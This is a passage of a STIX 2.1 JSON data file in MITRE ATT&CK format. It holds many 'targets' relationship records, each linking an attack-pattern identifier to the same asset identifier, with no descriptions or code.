"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce1041fe-21ac-4a37-9005-76b3dd4cb54e", "created": "2024-07-01T10:37:15.832338", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832340", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4f7a0e2-464a-4880-be6b-75ff1f511010", "created": "2024-07-01T10:37:15.832348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c09eeccc-b80a-46b6-b350-730b1accbae9", "created": "2024-07-01T10:37:15.832358", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832360", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7565d7b-d9cb-4782-9f51-bd932460ea50", "created": "2024-07-01T10:37:15.832368", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832370", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22be52ff-2540-48fa-9699-10892f805f2a", "created": "2024-07-01T10:37:15.832378", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832380", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--107c7a4d-0bda-4408-ab64-4c4fcfd6def6", "created": "2024-07-01T10:37:15.832388", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832390", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5860879d-48b4-439b-a42c-78e718fc1624", "created": "2024-07-01T10:37:15.832398", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832400", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--407e67a5-f8a1-4285-8c32-0975c8bcb447", "created": "2024-07-01T10:37:15.832407", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832409", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae0feb99-4b6a-4696-8139-25f1af3b53a5", "created": "2024-07-01T10:37:15.832417", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832419", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86158852-2eca-4614-b4b5-be79415571da", "created": "2024-07-01T10:37:15.832427", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832429", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87beb305-83e9-498a-acb6-174477e12d74", "created": "2024-07-01T10:37:15.832437", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832439", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--caf9d89d-8c1c-4e59-b2d8-1c75df52d19e", "created": "2024-07-01T10:37:15.832447", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832449", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26811f07-7cbc-4fa1-88b6-1745ef3e04c5", "created": "2024-07-01T10:37:15.832457", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832459", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e84c2290-4d1d-43a2-bde4-256daec14377", "created": "2024-07-01T10:37:15.832467", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832469", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31a72923-3ca9-4ffc-8989-17280beea6f7", "created": "2024-07-01T10:37:15.832477", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832479", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c4dc587-ca8c-41f2-b96d-4ff4b6f1a506", "created": "2024-07-01T10:37:15.832487", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832489", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cde65ebf-9618-4b55-8a6a-0f85cfa0bd20", "created": "2024-07-01T10:37:15.832497", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832499", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79a3e345-50bb-4d55-938d-f08ddf3313e3", "created": "2024-07-01T10:37:15.832507", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832509", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2afc0670-c2dc-401e-ad07-4fc5fe7710b2", "created": "2024-07-01T10:37:15.832517", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832519", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--281d3645-804d-48bd-940c-20095786f947", "created": "2024-07-01T10:37:15.832527", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832529", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e7365f0-f9c7-44b9-8db3-fc98b3b8de47", "created": "2024-07-01T10:37:15.832537", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832539", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--773e0bae-256d-4275-bf57-32f2d85adb46", "created": "2024-07-01T10:37:15.832546", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832549", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6be1c75-728f-413c-adf8-5193ac73b8d5", "created": "2024-07-01T10:37:15.832556", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832558", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e1c087d-d467-4ada-9e2f-f5ad59e2cb70", "created": "2024-07-01T10:37:15.832566", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832568", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f3a7e14-fc79-4a3b-ab98-11229297932f", "created": "2024-07-01T10:37:15.832576", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832578", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--353b9a49-911b-4826-89e4-685127208a44", "created": "2024-07-01T10:37:15.832586", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832588", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e82c8eeb-e50f-4d2c-8e8b-2b3a20ba76f9", "created": "2024-07-01T10:37:15.832596", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832598", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f1f18a4-ecdd-435f-b952-9beb89dfeadc", "created": "2024-07-01T10:37:15.832606", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832608", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbeb1f24-9536-45c7-9542-a14bd0ced3e8", "created": "2024-07-01T10:37:15.832616", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832618", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f0eb66fc-00ce-42e0-8eee-4a9918accfb4", "created": "2024-07-01T10:37:15.832625", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832628", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c435a9a9-afad-4e8a-8a83-457765dcc8f6", "created": "2024-07-01T10:37:15.832635", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832638", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ef94ed3-c060-4529-9db6-c5d637c3d9c1", "created": "2024-07-01T10:37:15.832645", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832647", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86be0224-fa2a-4922-8399-93c2f6e39900", "created": "2024-07-01T10:37:15.832655", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832657", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ebba9c5d-feee-4e05-93a9-92beb9c05abb", "created": "2024-07-01T10:37:15.832665", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832667", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a0216f4-4f55-4f63-aa67-00adf7db4fe1", "created": "2024-07-01T10:37:15.832675", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832677", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca809ba1-49bd-4542-9a71-1d954e686506", "created": "2024-07-01T10:37:15.832685", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832687", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d69a178c-8dbd-4df6-aa35-9db882b8019e", "created": "2024-07-01T10:37:15.832695", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832697", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--057a843e-d379-4c11-9817-397f49847542", "created": "2024-07-01T10:37:15.832705", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832707", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--306d5a9c-686c-48fd-b41a-cc00fb968ce6", "created": "2024-07-01T10:37:15.832715", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832718", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6271c0e5-4f21-4d87-bd06-c33b9e4a10b2", "created": "2024-07-01T10:37:15.832725", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832727", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dcb2166f-8a42-4f89-8e8b-92f05f9dff92", "created": "2024-07-01T10:37:15.832735", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832737", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b74d6ace-3743-4640-8741-7edab490d2cf", 